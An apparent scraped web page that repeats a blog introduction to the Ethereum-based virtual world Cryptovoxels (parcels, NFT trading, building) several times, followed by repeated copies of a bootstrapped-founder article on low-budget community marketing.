After you’re done exploring, you may be inspired to build something yourself. Once you purchase a parcel, or discover one in “sandbox” mode you’ll find that it’s pretty easy to get going, but much harder to build more complex builds.
At the most basic level, if you press “tab” on your property you’ll see a build menu pop-up with tons of options. If you head over to “Tiles” and select your preferred tile color and pattern, you can place them wherever you want in the bounds of your property!
If this reminds you of Minecraft, you’re right. Ben Nolan, the founder, says that Minecraft was a big inspiration for the project.
I was inspired by Minecraft and loved the idea of a Minecraft city that is owned by its users — Ben Nolan, Founder of Cryptovoxels
That explains the basics, but as you may have noticed from the YouTube video, there are tons of tutorials online. Once you get more advanced, you’ll likely be playing with Vox files which allow you to import more granular assets from external editors.
A Metaverse would not be complete without an economy. The main thing people exchange in Cryptovoxels are the parcels themselves, which can be bought and sold on OpenSea and TokenTrove. On the OpeanSea activity page, you can see that 277 ETH (approx. $70,000) worth of parcels have been traded this week, and 8480 ETH (approx. $2,000.000) worth has been traded in total. On average, parcels have gone for 1.9 ETH (approx. $475).
Above you can see the distribution of the ETH prices (in wei) for settled trades, a plot of ETH price vs. parcel height, and a plot of ETH price vs. parcel area over the past month (May 2020) or so. While you do see a lot of sales occur at the 1.5 ETH (approx. $375) mark, you also see some parcels go for over 10 ETH (approx. $2,500)! The plots show that while there is some noise, price is generally correlated with the size of the parcel.
It’s worth calling out that a lot more stuff is being exchanged in Cryptovoxels. For one, most of the world is an art gallery where the art is for sale. The art ranges from game collectibles (like CryptoKitties) to photography to classical art that has been tokenized.
On top of that, wearables have gotten incredibly popular lately. Wearables are items that you can put onto your avatar (you can also claim handles, and change your skin by the way). Entire malls, brands and promotional videos have emerged as a result. People are going nuts over these virtual products that are entirely generated by the community.
This is what it looks like when your avatar is completely decked out.
How to get a parcel
If the prices you see for parcels on OpenSea are a bit out of your price range, you should know that new parcels are minted every Tuesday at approximately 5pm PST. To get in on the action the best first step is to join the Cryptovoxels Discord, where the #general and #new-island channels will be the most relevant.
Every Tuesday the Cryptovoxels team releases new islands around Origin City. The process is likely to change in the future, but the way it works for now is that the team will bulk sell 20-30 new properties at prices from 1 ETH and above (perhaps lower, depending on the island).
To see the parcels before they go on sale, you can check OpenSea for “Recently Born” parcels, select the parcel that you’re interested in, and press “View on Cryptovoxels” to visit the parcel itself. Once the sale goes live, you’ll likely want to filter for that specific island, and sort by price.
If you are technically savvy, I’ve written a very simple script that will participate in the sales for you. However, unless you understand the code, I recommend taking the OpenSea approach. In my experience, it has been very easy to get a parcel this way.
When you succeed feel free to come say hi at my parcel!
Final thoughts
It’s not too late to join the party. The community is very welcoming and the Cryptovoxels team seems to be always implementing feature requests from people in the Discord channel. It’s a lot of fun to see it evolve, and I’m sure it will be a lot different just a couple of months from now.
As mentioned above, new parcels are being added all the time. You can check out some awesome parcel stats at this Dune Analytics dashboard.
The term “Metaverse” was originally coined by Neal Stephenson in his 1992 novel Snow Crash. In the Metaverse humans, as avatars, interact with each other and software agents, in a three-dimensional space that uses the metaphor of the real world. Stephenson used the term to describe a virtual reality-based successor to the Internet.
A more recent rendition of the Metaverse can be seen in the movie Ready Player One, where it is called “The OASIS”.
What is Cryptovoxels?
Cryptovoxels is a Metaverse that runs in your browser (and phone, and VR headset). It uses the Ethereum blockchain to track ownership of goods in its economy, most importantly property. It has come a long way since the original trailer (above) was released.
Cryptovoxels is a virtual world powered by the Ethereum blockchain. Players can buy land and build stores and art galleries. Editing tools, avatars, text chat and voice chat are built in. — cryptovoxels.com
There are other similar projects on Ethereum, such as Decentraland and The Sandbox, but this post will focus on Cryptovoxels.
Why Ethereum?
From an implementation standpoint, there is no reason you technically need a blockchain to build a Metaverse. In fact, building Cryptovoxels on Ethereum likely came with its unique set of challenges.
However, building on Ethereum also comes with some unique advantages. For one, it just fits the ethos. In Ready Player One the OASIS becomes so important that the company running it becomes one of the most valuable in the world. In fact, the OASIS is so valuable that the central conflict of the movie is about who owns and controls it.
Having Cryptovoxel parcel ownership be tracked on Ethereum provides users with strong guarantees that their assets cannot simply be taken away by the creators. While it is true that the entire game isn’t decentralized, and that the creators could change the game to ignore what Ethereum says, the fact that it is built on Ethereum shows a commitment to letting the users own the world.
This commitment has allowed Cryptovoxels to attract the right kind of early adopters, who have taken ownership of the world in their own right. More specifically, it has attracted designers, painters, modeling experts, architects, digital artists, etc…. These artists have done an amazing job in building out the world and making it a place worth exploring and hanging out in.
Finally, there is at least one more tangible advantage to building a Metaverse on Ethereum: existing assets and infrastructure. The Cryptovoxel world is highly compatible with the rest of the Ethereum ecosystem, especially the ERC-721 standard (also known as Non-Fungible Tokens).
Many users already own NFTs (such as CryptoKitties), and will see Cryptovoxels as a perfect place to display and sell them. Cryptovoxel parcels are also NFTs, and so are compatible with existing exchange infrastructure, which means the creators of Cryptovoxels never had to build an exchange to let their users trade parcels.
What can you do?
While Cryptovoxels feels like a game, it is just an open world. There are no clear objectives. You do whatever you want.
Explore
One of the best things to do in Cryptovoxels is to wander around. Every time I explore, I find something new and surprising.
You can see that the map displays a few islands and neighborhoods, such as “Proxima” or “Moon”. At the time of writing, there are 31 neighborhoods and 4 islands, although more are coming online every week.
Each neighborhood has its unique look-and-feel. In Area 51, you’ll see a lot of alien themed content, and in Kitties, you’ll see a lot of references to and collectibles from the CryptoKitties game. Neighborhood building restrictions come into play as well, as some neighborhoods such as Frankfurt allow for taller buildings and therefore have a big city vibe.
Of course, neighborhoods are just composed of individual parcels with unique owners and unique builds — some more impressive than others. Take the DAI House for example, which is a tribute to the DAI cryptocurrency and boasts fountains and spinning 3DDAI models. Another example is the Token Smart Amphitheatre, which displays some impressive architecture and even a cafe, or Sugar Club where people go to listen to music and dance (yes, there is a dance button).
There are also quite a few personalities and magnates in Cryptovoxels, who are responsible for building and advertising some of the biggest builds and events. Artist, architect and “Photoshop Priest” Alotta Money recently advertised the opening party for the Voxel Hotel, which has to be the most impressive build I’ve seen in Cryptovoxels so far.
In fact, as recently as yesterday, people have been gathering at the Voxel Hotel and elsewhere for legitimate meet-ups and events. Many of these meet-ups are well organized and have considerable thought put into them.
There are plenty of secrets to discover as well, as some of the best builds and experiences are hidden away. If you check out EtherBrews it appears to be a simple brewery on the water, but if you go inside and fly over the wall, you’ll find a beautiful tree. Some builds are straight up puzzles, like Yours Truly Puzzle (can you get in?). Finally, you may even find games like Breakout appear on random corners of the world since better scripting functionality has been added.
The above only scratches the surface of what you can explore in Cryptovoxels. You can watch live events as Cryptovoxels supports YouTube embeds and Twitch streams, you can go shopping (more on that later) and even pray in a virtual church if that’s your thing.
Build
After you’re done exploring, you may be inspired to build something yourself. Once you purchase a parcel, or discover one in “sandbox” mode you’ll find that it’s pretty easy to get going, but much harder to build more complex builds.
At the most basic level, if you press “tab” on your property you’ll see a build menu pop-up with tons of options. If you head over to “Tiles” and select your preferred tile color and pattern, you can place them wherever you want in the bounds of your property!
If this reminds you of Minecraft, you’re right. Ben Nolan, the founder, says that Minecraft was a big inspiration for the project.
I was inspired by Minecraft and loved the idea of a Minecraft city that is owned by its users — Ben Nolan, Founder of Cryptovoxels
That explains the basics, but as you may have noticed from the YouTube video, there are tons of tutorials online. Once you get more advanced, you’ll likely be playing with Vox files which allow you to import more granular assets from external editors.
A Metaverse would not be complete without an economy. The main thing people exchange in Cryptovoxels are the parcels themselves, which can be bought and sold on OpenSea and TokenTrove. On the OpeanSea activity page, you can see that 277 ETH (approx. $70,000) worth of parcels have been traded this week, and 8480 ETH (approx. $2,000.000) worth has been traded in total. On average, parcels have gone for 1.9 ETH (approx. $475).
Above you can see the distribution of the ETH prices (in wei) for settled trades, a plot of ETH price vs. parcel height, and a plot of ETH price vs. parcel area over the past month (May 2020) or so. While you do see a lot of sales occur at the 1.5 ETH (approx. $375) mark, you also see some parcels go for over 10 ETH (approx. $2,500)! The plots show that while there is some noise, price is generally correlated with the size of the parcel.
It’s worth calling out that a lot more stuff is being exchanged in Cryptovoxels. For one, most of the world is an art gallery where the art is for sale. The art ranges from game collectibles (like CryptoKitties) to photography to classical art that has been tokenized.
On top of that, wearables have gotten incredibly popular lately. Wearables are items that you can put onto your avatar (you can also claim handles, and change your skin by the way). Entire malls, brands and promotional videos have emerged as a result. People are going nuts over these virtual products that are entirely generated by the community.
This is what it looks like when your avatar is completely decked out.
How to get a parcel
If the prices you see for parcels on OpenSea are a bit out of your price range, you should know that new parcels are minted every Tuesday at approximately 5pm PST. To get in on the action the best first step is to join the Cryptovoxels Discord, where the #general and #new-island channels will be the most relevant.
Every Tuesday the Cryptovoxels team releases new islands around Origin City. The process is likely to change in the future, but the way it works for now is that the team will bulk sell 20-30 new properties at prices from 1 ETH and above (perhaps lower, depending on the island).
To see the parcels before they go on sale, you can check OpenSea for “Recently Born” parcels, select the parcel that you’re interested in, and press “View on Cryptovoxels” to visit the parcel itself. Once the sale goes live, you’ll likely want to filter for that specific island, and sort by price.
If you are technically savvy, I’ve written a very simple script that will participate in the sales for you. However, unless you understand the code, I recommend taking the OpenSea approach. In my experience, it has been very easy to get a parcel this way.
When you succeed feel free to come say hi at my parcel!
Final thoughts
It’s not too late to join the party. The community is very welcoming and the Cryptovoxels team seems to be always implementing feature requests from people in the Discord channel. It’s a lot of fun to see it evolve, and I’m sure it will be a lot different just a couple of months from now.
As mentioned above, new parcels are being added all the time. You can check out some awesome parcel stats at this Dune Analytics dashboard.
The term“Metaverse” was originally coined by Neal Stephenson in his 1992 novel Snow Crash. In the Metaverse humans, as avatars, interact with each other and software agents, in a three-dimensional space that uses the metaphor of the real world. Stephenson used the term to describe a virtual reality-based successor to the Internet.
A more recent rendition of the Metaverse can be seen in the movie Ready Player One, where it is called“The OASIS”.
What is Cryptovoxels?
Cryptovoxels is a Metaverse that runs in your browser (and phone, and VR headset). It uses the Ethereum blockchain to track ownership of goods in its economy, most importantly property. It has come a long way since the original trailer (above) was released.
Cryptovoxels is a virtual world powered by the Ethereum blockchain. Players can buy land and build stores and art galleries. Editing tools, avatars, text chat and voice chat are built in. — cryptovoxels.com
There are other similar projects on Ethereum, such as Decentraland and The Sandbox, but this post will focus on Cryptovoxels.
Why Ethereum?
From an implementation standpoint, there is no reason you technically need a blockchain to build a Metaverse. In fact, building Cryptovoxels on Ethereum likely came with its unique set of challenges.
However, building on Ethereum also comes with some unique advantages. For one, it just fits the ethos. In Ready Player One the OASIS becomes so important that the company running it becomes one of the most valuable in the world. In fact, the OASIS is so valuable that the central conflict of the movie is about who owns and controls it.
Having Cryptovoxel parcel ownership be tracked on Ethereum provides users with strong guarantees that their assets cannot simply be taken away by the creators. While it is true that the entire game isn’t decentralized, and that the creators could change the game to ignore what Ethereum says, the fact that it is built on Ethereum shows a commitment to letting the users own the world.
This commitment has allowed Cryptovoxels to attract the right kind of early adopters, who have taken ownership of the world in their own right. More specifically, it has attracted designers, painters, modeling experts, architects, digital artists, etc…. These artists have done an amazing job in building out the world and making it a place worth exploring and hanging out in.
Finally, there is at least one more tangible advantage to building a Metaverse on Ethereum: existing assets and infrastructure. The Cryptovoxel world is highly compatible with the rest of the Ethereum ecosystem, especially the ERC-721 standard (also known as Non-Fungible Tokens).
Many users already own NFTs (such as CryptoKitties), and will see Cryptovoxels as a perfect place to display and sell them. Cryptovoxel parcels are also NFTs, and so are compatible with existing exchange infrastructure, which means the creators of Cryptovoxels never had to build an exchange to let their users trade parcels.
What can you do?
While Cryptovoxels feels like a game, it is just an open world. There are no clear objectives. You do whatever you want.
Explore
One of the best things to do in Cryptovoxels is to wander around. Every time I explore, I find something new and surprising.
You can see that the map displays a few islands and neighborhoods, such as“Proxima” or“Moon”. At the time of writing, there are 31 neighborhoods and 4 islands, although more are coming online every week.
Each neighborhood has its unique look-and-feel. In Area 51, you’ll see a lot of alien themed content, and in Kitties, you’ll see a lot of references to and collectibles from the CryptoKitties game. Neighborhood building restrictions come into play as well, as some neighborhoods such as Frankfurt allow for taller buildings and therefore have a big city vibe.
Of course, neighborhoods are just composed of individual parcels with unique owners and unique builds — some more impressive than others. Take the DAI House for example, which is a tribute to the DAI cryptocurrency and boasts fountains and spinning 3DDAI models. Another example is the Token Smart Amphitheatre, which displays some impressive architecture and even a cafe, or Sugar Club where people go to listen to music and dance (yes, there is a dance button).
There are also quite a few personalities and magnates in Cryptovoxels, who are responsible for building and advertising some of the biggest builds and events. Artist, architect and“Photoshop Priest” Alotta Money recently advertised the opening party for the Voxel Hotel, which has to be the most impressive build I’ve seen in Cryptovoxels so far.
In fact, as recently as yesterday, people have been gathering at the Voxel Hotel and elsewhere for legitimate meet-ups and events. Many of these meet-ups are well organized and have considerable thought put into them.
There are plenty of secrets to discover as well, as some of the best builds and experiences are hidden away. If you check out EtherBrews it appears to be a simple brewery on the water, but if you go inside and fly over the wall, you’ll find a beautiful tree. Some builds are straight up puzzles, like Yours Truly Puzzle (can you get in?). Finally, you may even find games like Breakout appear on random corners of the world since better scripting functionality has been added.
The above only scratches the surface of what you can explore in Cryptovoxels. You can watch live events as Cryptovoxels supports YouTube embeds and Twitch streams, you can go shopping (more on that later) and even pray in a virtual church if that’s your thing.
Build
After you’re done exploring, you may be inspired to build something yourself. Once you purchase a parcel, or discover one in“sandbox” mode you’ll find that it’s pretty easy to get going, but much harder to build more complex builds.
At the most basic level, if you press“tab” on your property you’ll see a build menu pop-up with tons of options. If you head over to“Tiles” and select your preferred tile color and pattern, you can place them wherever you want in the bounds of your property!
If this reminds you of Minecraft, you’re right. Ben Nolan, the founder, says that Minecraft was a big inspiration for the project.
I was inspired by Minecraft and loved the idea of a Minecraft city that is owned by its users — Ben Nolan, Founder of Cryptovoxels
That explains the basics, but as you may have noticed from the YouTube video, there are tons of tutorials online. Once you get more advanced, you’ll likely be playing with Vox files which allow you to import more granular assets from external editors.
A Metaverse would not be complete without an economy. The main thing people exchange in Cryptovoxels are the parcels themselves, which can be bought and sold on OpenSea and TokenTrove. On the OpeanSea activity page, you can see that 277 ETH (approx. $70,000) worth of parcels have been traded this week, and 8480 ETH (approx. $2,000.000) worth has been traded in total. On average, parcels have gone for 1.9 ETH (approx. $475).
Above you can see the distribution of the ETH prices (in wei) for settled trades, a plot of ETH price vs. parcel height, and a plot of ETH price vs. parcel area over the past month (May 2020) or so. While you do see a lot of sales occur at the 1.5 ETH (approx. $375) mark, you also see some parcels go for over 10 ETH (approx. $2,500)! The plots show that while there is some noise, price is generally correlated with the size of the parcel.
It’s worth calling out that a lot more stuff is being exchanged in Cryptovoxels. For one, most of the world is an art gallery where the art is for sale. The art ranges from game collectibles (like CryptoKitties) to photography to classical art that has been tokenized.
On top of that, wearables have gotten incredibly popular lately. Wearables are items that you can put onto your avatar (you can also claim handles, and change your skin by the way). Entire malls, brands and promotional videos have emerged as a result. People are going nuts over these virtual products that are entirely generated by the community.
This is what it looks like when your avatar is completely decked out.
How to get a parcel
If the prices you see for parcels on OpenSea are a bit out of your price range, you should know that new parcels are minted every Tuesday at approximately 5pm PST. To get in on the action the best first step is to join the Cryptovoxels Discord, where the #general and #new-island channels will be the most relevant.
Every Tuesday the Cryptovoxels team releases new islands around Origin City. The process is likely to change in the future, but the way it works for now is that the team will bulk sell 20-30 new properties at prices from 1 ETH and above (perhaps lower, depending on the island).
To see the parcels before they go on sale, you can check OpenSea for “Recently Born” parcels, select the parcel that you’re interested in, and press“View on Cryptovoxels” to visit the parcel itself. Once the sale goes live, you’ll likely want to filter for that specific island, and sort by price.
If you are technically savvy, I’ve written a very simple script that will participate in the sales for you. However, unless you understand the code, I recommend taking the OpenSea approach. In my experience, it has been very easy to get a parcel this way.
When you succeed feel free to come say hi at my parcel!
Final thoughts
It’s not too late to join the party. The community is very welcoming and the Cryptovoxels team seems to be always implementing feature requests from people in the Discord channel. It’s a lot of fun to see it evolve, and I’m sure it will be a lot different just a couple of months from now.
As mentioned above, new parcels are being added all the time. You can check out some awesome parcel stats at this Dune Analytics dashboard.
title: Spreading the Word: How to Do Marketing on a Shoestring Budget - The Bootstrapped Founder
title: Spreading the Word: How to Do Marketing on a Shoestring Budget description: Learn about the three components to spreading the word efficiently, all interacting with each other: tribes, water coolers, and word-of-mouth. author: Arvid Kahl image: https://i2.wp.com/thebootstrappedfounder.com/wp-content/uploads/2020/06/SocialShareSpreadingTheWord.png?fit=1200%2C628&ssl=1
author: View all posts by Arvid Kahl description: Learn about the three components to spreading the word efficiently, all interacting with each other: tribes, water coolers, and word-of-mouth. image: https://i2.wp.com/thebootstrappedfounder.com/wp-content/uploads/2020/06/SocialShareSpreadingTheWord.png?fit=1200%2C628&ssl=1 title: Spreading the Word: How to Do Marketing on a Shoestring Budget - The Bootstrapped Founder
Reading Time: 5minutes
One beautiful thing about a niche is that there is a certain similarity between the people in it. They are likely to frequent the same social media, read the same blogs, visit the same websites. They often are organized in communities where word of mouth spreads quickly.
You can leverage the density of these networks by becoming a part of them. Genuinely participate in niche communities. Don’t just use them as a marketing platform. Contribute before you advertise. Better, don’t advertise at all, create meaningful content around your product, and share that in a way that is helpful to people even without engaging with the product directly.
Three components are essential to spreading the word efficiently, and they all interact with each other: tribes, water coolers, and word-of-mouth. And they are all quite affordable.
The Power of Tribes
You want to become part of and eventually lead a tribe. Tribes are communities that long for connection and shared interests, and members of a tribe follow the same community leaders. Facilitate more connection or satisfy people’s interests, and you will be a voice in the community that your potential customers will listen to.
Tribes form around all kinds of topics. Some are obvious in our day-to-day lives, like fans of sports clubs. Others are extremely niche and highly virtual, like some obscure internet forum of carpet aficionados. But they are essentially the same: they all revolve around a central interest, and people talk about it with each other.
This makes tribes a great audience for your product. A very homogenous audience can be marketed to quite easily, as you know exactly where you can reach them and what language they speak.
The Power of the Water Cooler
Find the water cooler. The locations where your customers congregate when they are not hard at work can provide insightful information, as people talk more freely there than in professional circles.
Most of these water coolers are found in social networks like Facebook or Twitter. Reddit is a perfect place to look, as the sheer amount of specific subreddits makes it quite likely that there will be a vibrant community for your niche audience. Tribes are notorious for having very active water coolers, and once you find one, becoming a member is very worthwhile.
Listen to what people ask and complain about and offer your product embedded in more general advice. Shameless promotion is usually frowned upon in these communities, so you will need to provide something helpful and meaningful along with your plug. It is beneficial to become an actual member of the community before doing any intentional marketing. This will help you learn the language of the tribe and give you a chance to communicate with people, establishing yourself as a genuine member of their group.
Water coolers are wonderful for your content marketing in two ways. Initially, you will have the opportunity to see what your audience is interested in because that’s the content they share and engage with. Once you’ve understood what works for them and what does not, you can create content that you can be sure your audience will enjoy. Since you’ve already been a member of the community for a bit, you can provide quality content and market your product at the same time.
The Power of Word of Mouth
Word of mouth is the highest-converting way of spreading the word. Convince people to convince others and give them the tools to do so. Create easy-to-consume and easy-to-share content that existing customers can forward to new prospects. Allow them to mentor their peers into using your product by adding means to connect inside the product. This works particularly well with a referral system.
Word of mouth works mostly for low-touch businesses. Because these companies have a large number of customers and prospects that can take a look at a product through easy and self-service signups, word of mouth can happen without your intervention or encouragement.
In high-touch businesses, word of mouth works differently. Most of the time in B2B industries, your product is not very shareable because it gives an edge to the businesses that use it. Instead of everyone in the industry talking about your product, you want everyone in the businesses you would like as customers to talk about your solution before you reach out through direct sales.
There is one thing about word of mouth that you need to be aware of. You have almost no means to censor or steer the conversation. If there is something negative about your business, communities and tribes will discuss it. For many founders, hearing people complain about their service feels painful, but it’s a normal part of the business. In the end, even a neutral or negative conversation will keep your brand on the minds of your prospects and remind them of the fact that you’re at least trying to help.
Your Most Effective Marketing Strategy: Helping Your Tribe
Unlike large agencies, bootstrapped founders usually don’t want to spend tens of thousands of dollars per month on social media advertisements. That doesn’t mean you can’t leverage social media for your marketing. Quite the opposite: a well-executed social media strategy can outperform pay-per-click ads significantly — it definitely did for us at FeedbackPanda.
We experimented with paid ads, of course. And we didn’t see any additional engagement compared to our existing content marketing and outreach strategies. So we doubled down on that, and it was the right choice for us.
And there was a very basic assumption underpinning all of the marketing efforts: it’s not about us pushing a message into an audience of receivers, hoping for signups conversions. It’s about fostering a community that is eager to spread our messages, building our brand, and giving us recognition and reputation. To accomplish that, you have to focus on building a community first, and on your own messaging second. You need to help your tribe grow stronger, and they will be an amplifier for your messages.
If you’re fortunate enough to sell to a very focused niche that is at best a highly active tribe or at worst a loose community, here are a few ways of how you can help them:
Facilitate communication. Allow for more connections between the people in your niche. Enable existing communities or build one yourself using community software like Circle.so or Tribe.so. Interview leaders in the community on your blog, giving them more reach and their voices more impact. Interview members of your community, showcasing both their uniqueness and their belonging to the tribe at the same time. Syndicate user-generated content on your blog. Turn regular tribe members into influencers through your outlets.
Facilitate exchange. From day one, envision your product to have a component where your users can share something. It can be data, insights, best practices, support, frankly anything. Give your users a chance to empower each other, and they will make sure to increase their impact radius by carrying your service to their peers. Offer free resources from inside the community, and share your content with other outlets in the niche.
Produce and syndicate valuable content. No matter if you’re producing a podcast, regular blog posts, a video series, or you write articles with ratings, reviews, and testimonials: as long as you provide helpful and meaningful content for your niche, you will have followers that spread it. As your content is written for your customers, any new reader will likely be an excellent candidate to become a new customer as well.
All of this generates trust. Trust is the currency of tribes, and with enough trust, people want to listen to you. You don’t need to spend money on marketing, and frankly, you couldn’t buy this kind of relationship with your customers if you wanted to.
Use the fact that you’re selling to a niche audience to your advantage and become a leader in your tribe. Help it grow, help your community members to learn and get ahead. This way, you’ll end up with a never-ending stream of eager customers who trust you and amplify your messages.
Arvid Kahl is a software engineer turned entrepreneur. He co-founded and FeedbackPanda, an online teacher productivity SaaS company, with his partner Danielle Simpson. They sold the business for a life-changing amount of money in 2019, two years after founding the business.
Arvid writes on TheBootstrappedFounder.com because bootstrapping is a desirable, value- and wealth-generating way of running a company.
In over a decade of working in startup businesses of all sizes, Arvid has learned a thing or two about what works, what doesn't, and how to increase the chances of building a successful business.
View all posts by Arvid Kahl
Reading Time: 5minutes
One beautiful thing about a niche is that there is a certain similarity between the people in it. They are likely to frequent the same social media, read the same blogs, visit the same websites. They often are organized in communities where word of mouth spreads quickly.
You can leverage the density of these networks by becoming a part of them. Genuinely participate in niche communities. Don’t just use them as a marketing platform. Contribute before you advertise. Better, don’t advertise at all, create meaningful content around your product, and share that in a way that is helpful to people even without engaging with the product directly.
Three components are essential to spreading the word efficiently, and they all interact with each other: tribes, water coolers, and word-of-mouth. And they are all quite affordable.
The Power of Tribes
You want to become part of and eventually lead a tribe. Tribes are communities that long for connection and shared interests, and members of a tribe follow the same community leaders. Facilitate more connection or satisfy people’s interests, and you will be a voice in the community that your potential customers will listen to.
Tribes form around all kinds of topics. Some are obvious in our day-to-day lives, like fans of sports clubs. Others are extremely niche and highly virtual, like some obscure internet forum of carpet aficionados. But they are essentially the same: they all revolve around a central interest, and people talk about it with each other.
This makes tribes a great audience for your product. A very homogenous audience can be marketed to quite easily, as you know exactly where you can reach them and what language they speak.
The Power of the Water Cooler
Find the water cooler. The locations where your customers congregate when they are not hard at work can provide insightful information, as people talk more freely there than in professional circles.
Most of these water coolers are found in social networks like Facebook or Twitter. Reddit is a perfect place to look, as the sheer amount of specific subreddits makes it quite likely that there will be a vibrant community for your niche audience. Tribes are notorious for having very active water coolers, and once you find one, becoming a member is very worthwhile.
Listen to what people ask and complain about and offer your product embedded in more general advice. Shameless promotion is usually frowned upon in these communities, so you will need to provide something helpful and meaningful along with your plug. It is beneficial to become an actual member of the community before doing any intentional marketing. This will help you learn the language of the tribe and give you a chance to communicate with people, establishing yourself as a genuine member of their group.
Water coolers are wonderful for your content marketing in two ways. Initially, you will have the opportunity to see what your audience is interested in because that’s the content they share and engage with. Once you’ve understood what works for them and what does not, you can create content that you can be sure your audience will enjoy. Since you’ve already been a member of the community for a bit, you can provide quality content and market your product at the same time.
The Power of Word of Mouth
Word of mouth is the highest-converting way of spreading the word. Convince people to convince others and give them the tools to do so. Create easy-to-consume and easy-to-share content that existing customers can forward to new prospects. Allow them to mentor their peers into using your product by adding means to connect inside the product. This works particularly well with a referral system.
Word of mouth works mostly for low-touch businesses. Because these companies have a large number of customers and prospects that can take a look at a product through easy and self-service signups, word of mouth can happen without your intervention or encouragement.
In high-touch businesses, word of mouth works differently. Most of the time in B2B industries, your product is not very shareable because it gives an edge to the businesses that use it. Instead of everyone in the industry talking about your product, you want everyone in the businesses you would like as customers to talk about your solution before you reach out through direct sales.
There is one thing about word of mouth that you need to be aware of. You have almost no means to censor or steer the conversation. If there is something negative about your business, communities and tribes will discuss it. For many founders, hearing people complain about their service feels painful, but it’s a normal part of the business. In the end, even a neutral or negative conversation will keep your brand on the minds of your prospects and remind them of the fact that you’re at least trying to help.
Your Most Effective Marketing Strategy: Helping Your Tribe
Unlike large agencies, bootstrapped founders usually don’t want to spend tens of thousands of dollars per month on social media advertisements. That doesn’t mean you can’t leverage social media for your marketing. Quite the opposite: a well-executed social media strategy can outperform pay-per-click ads significantly — it definitely did for us at FeedbackPanda.
We experimented with paid ads, of course. And we didn’t see any additional engagement compared to our existing content marketing and outreach strategies. So we doubled down on that, and it was the right choice for us.
And there was a very basic assumption underpinning all of the marketing efforts: it’s not about us pushing a message into an audience of receivers, hoping for signups conversions. It’s about fostering a community that is eager to spread our messages, building our brand, and giving us recognition and reputation. To accomplish that, you have to focus on building a community first, and on your own messaging second. You need to help your tribe grow stronger, and they will be an amplifier for your messages.
If you’re fortunate enough to sell to a very focused niche that is at best a highly active tribe or at worst a loose community, here are a few ways of how you can help them:
Facilitate communication. Allow for more connections between the people in your niche. Enable existing communities or build one yourself using community software like Circle.so or Tribe.so. Interview leaders in the community on your blog, giving them more reach and their voices more impact. Interview members of your community, showcasing both their uniqueness and their belonging to the tribe at the same time. Syndicate user-generated content on your blog. Turn regular tribe members into influencers through your outlets.
Facilitate exchange. From day one, envision your product to have a component where your users can share something. It can be data, insights, best practices, support, frankly anything. Give your users a chance to empower each other, and they will make sure to increase their impact radius by carrying your service to their peers. Offer free resources from inside the community, and share your content with other outlets in the niche.
Produce and syndicate valuable content. No matter if you’re producing a podcast, regular blog posts, a video series, or you write articles with ratings, reviews, and testimonials: as long as you provide helpful and meaningful content for your niche, you will have followers that spread it. As your content is written for your customers, any new reader will likely be an excellent candidate to become a new customer as well.
All of this generates trust. Trust is the currency of tribes, and with enough trust, people want to listen to you. You don’t need to spend money on marketing, and frankly, you couldn’t buy this kind of relationship with your customers if you wanted to.
Use the fact that you’re selling to a niche audience to your advantage and become a leader in your tribe. Help it grow, help your community members to learn and get ahead. This way, you’ll end up with a never-ending stream of eager customers who trust you and amplify your messages.
One beautiful thing about a niche is that there is a certain similarity between the people in it. They are likely to frequent the same social media, read the same blogs, visit the same websites. They often are organized in communities where word of mouth spreads quickly.
You can leverage the density of these networks by becoming a part of them. Genuinely participate in niche communities. Don’t just use them as a marketing platform. Contribute before you advertise. Better, don’t advertise at all, create meaningful content around your product, and share that in a way that is helpful to people even without engaging with the product directly.
Three components are essential to spreading the word efficiently, and they all interact with each other: tribes, water coolers, and word-of-mouth. And they are all quite affordable.
The Power of Tribes
You want to become part of and eventually lead a tribe. Tribes are communities that long for connection and shared interests, and members of a tribe follow the same community leaders. Facilitate more connection or satisfy people’s interests, and you will be a voice in the community that your potential customers will listen to.
Tribes form around all kinds of topics. Some are obvious in our day-to-day lives, like fans of sports clubs. Others are extremely niche and highly virtual, like some obscure internet forum of carpet aficionados. But they are essentially the same: they all revolve around a central interest, and people talk about it with each other.
This makes tribes a great audience for your product. A very homogenous audience can be marketed to quite easily, as you know exactly where you can reach them and what language they speak.
The Power of the Water Cooler
Find the water cooler. The locations where your customers congregate when they are not hard at work can provide insightful information, as people talk more freely there than in professional circles.
Most of these water coolers are found in social networks like Facebook or Twitter. Reddit is a perfect place to look, as the sheer amount of specific subreddits makes it quite likely that there will be a vibrant community for your niche audience. Tribes are notorious for having very active water coolers, and once you find one, becoming a member is very worthwhile.
Listen to what people ask and complain about and offer your product embedded in more general advice. Shameless promotion is usually frowned upon in these communities, so you will need to provide something helpful and meaningful along with your plug. It is beneficial to become an actual member of the community before doing any intentional marketing. This will help you learn the language of the tribe and give you a chance to communicate with people, establishing yourself as a genuine member of their group.
Water coolers are wonderful for your content marketing in two ways. Initially, you will have the opportunity to see what your audience is interested in because that’s the content they share and engage with. Once you’ve understood what works for them and what does not, you can create content that you can be sure your audience will enjoy. Since you’ve already been a member of the community for a bit, you can provide quality content and market your product at the same time.
The Power of Word of Mouth
Word of mouth is the highest-converting way of spreading the word. Convince people to convince others and give them the tools to do so. Create easy-to-consume and easy-to-share content that existing customers can forward to new prospects. Allow them to mentor their peers into using your product by adding means to connect inside the product. This works particularly well with a referral system.
Word of mouth works mostly for low-touch businesses. Because these companies have a large number of customers and prospects that can take a look at a product through easy and self-service signups, word of mouth can happen without your intervention or encouragement.
In high-touch businesses, word of mouth works differently. Most of the time in B2B industries, your product is not very shareable because it gives an edge to the businesses that use it. Instead of everyone in the industry talking about your product, you want everyone in the businesses you would like as customers to talk about your solution before you reach out through direct sales.
There is one thing about word of mouth that you need to be aware of. You have almost no means to censor or steer the conversation. If there is something negative about your business, communities and tribes will discuss it. For many founders, hearing people complain about their service feels painful, but it’s a normal part of the business. In the end, even a neutral or negative conversation will keep your brand on the minds of your prospects and remind them of the fact that you’re at least trying to help.
Your Most Effective Marketing Strategy: Helping Your Tribe
Unlike large agencies, bootstrapped founders usually don’t want to spend tens of thousands of dollars per month on social media advertisements. That doesn’t mean you can’t leverage social media for your marketing. Quite the opposite: a well-executed social media strategy can outperform pay-per-click ads significantly — it definitely did for us at FeedbackPanda.
We experimented with paid ads, of course. And we didn’t see any additional engagement compared to our existing content marketing and outreach strategies. So we doubled down on that, and it was the right choice for us.
And there was a very basic assumption underpinning all of the marketing efforts: it’s not about us pushing a message into an audience of receivers, hoping for signups conversions. It’s about fostering a community that is eager to spread our messages, building our brand, and giving us recognition and reputation. To accomplish that, you have to focus on building a community first, and on your own messaging second. You need to help your tribe grow stronger, and they will be an amplifier for your messages.
